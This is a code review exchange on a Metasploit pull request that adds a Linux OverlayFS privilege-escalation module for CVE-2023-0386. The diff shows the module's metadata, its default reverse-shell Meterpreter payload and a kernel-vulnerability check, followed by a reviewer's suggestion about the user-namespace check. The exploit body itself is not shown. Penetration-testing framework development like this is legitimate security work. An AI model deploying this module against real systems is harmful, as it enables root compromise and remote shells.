modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb

```diff
@@ -0,0 +1,157 @@
+          This exploit targets the Linux kernel bug in OverlayFS.
+
+          A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities
+          was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount.
+          This uid mapping bug allows a local user to escalate their privileges on the system.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'xkaneiki', # Exploit development
+          'sxlmnwb', # Exploit development
+          'Takahiro Yokoyama', # Metasploit Module
+        ],
+        'DisclosureDate' => '2023-03-22',
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Platform' => [ 'linux' ],
+        'Arch' => [
+          ARCH_X64,
+        ],
+        'Targets' => [['Automatic', {}]],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'AppendExit' => true,
+          'PrependSetresuid' => true,
+          'PrependSetresgid' => true,
+          'PrependSetreuid' => true,
+          'PrependSetuid' => true,
+          'PrependFork' => true,
+          'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+        },
+        'Privileged' => true,
+        'References' => [
+          [ 'CVE', '2023-0386' ],
+          [ 'URL', 'https://github.com/sxlmnwb/CVE-2023-0386' ],
+          [ 'URL', 'https://github.com/DataDog/security-labs-pocs/tree/main/proof-of-concept-exploits/overlayfs-cve-2023-0386' ],
+          [ 'URL', 'https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/' ],
+          [ 'URL', 'https://www.vicarius.io/vsociety/posts/cve-2023-0386-a-linux-kernel-bug-in-overlayfs' ],
+        ],
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        }
+      )
+    )
+    register_options([
+      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]),
+      OptInt.new('TIMEOUT', [ true, 'Timeout for exploit (seconds)', '60' ])
+    ])
+    register_advanced_options([
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ])
+  end
+
+  def check
+    unless kernel_arch.include?('x64')
+      return CheckCode::Safe("System architecture #{kernel_arch} is not supported")
+    end
+
+    kernel_version = Rex::Version.new(kernel_release.split('-').first)
+    if kernel_version < Rex::Version.new('5.11') ||
+       Rex::Version.new('5.15.91') <= kernel_version && kernel_version < Rex::Version.new('5.16') ||
+       Rex::Version.new('6.1.9') <= kernel_version
+      return CheckCode::Safe("Linux kernel version #{kernel_version} is not vulnerable")
+    end
+
+    unless kernel_config && kernel_config.include?('CONFIG_USER_NS=y')
+      return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS=y')
+    end
```

Comment:
The error message will be wrong if `/boot/config-…` isn't readable.

Reply:
> The error message will be wrong if `/boot/config-…` isn't readable.

Usually we do something like this:

```suggestion
    unless userns_enabled?
      return CheckCode::Safe('Unprivileged user namespaces are not permitted')
    end
```


https://github.com/rapid7/metasploit-framework/blob/8e94a0d805a91fad134eb243f280163f7afed1c9/lib/msf/core/post/linux/kernel.rb#L162-L173

Reply:
Thank you!  https://github.com/rapid7/metasploit-framework/pull/19441/commits/a40fbb2a7b78643875c1128e08ee62b7ad28e20f